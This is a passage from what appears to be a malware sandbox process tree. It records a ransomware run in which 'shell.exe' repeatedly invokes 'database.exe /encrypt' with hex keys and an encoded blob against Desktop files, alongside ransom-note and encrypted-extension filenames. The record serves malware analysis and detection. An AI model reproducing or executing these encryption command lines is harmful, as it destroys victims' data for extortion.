                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ConvertFromExport.vssm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6328
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4260
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisableProtect.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5644
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisconnectWait.bmp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ExitGrant.svgz.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FILES ENCRYPTED.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\FindRepair.vsdm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\HideClose.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeAssert.pps.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\InitializeResolve.mhtml.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\JoinRestart.nfo.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ProtectOpen.jpeg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ReceiveExpand.avi.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RemoveSet.mp2v.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ResetCopy.mpeg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RestoreExpand.fon.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\RevokeHide.vsx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ShowPush.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2824
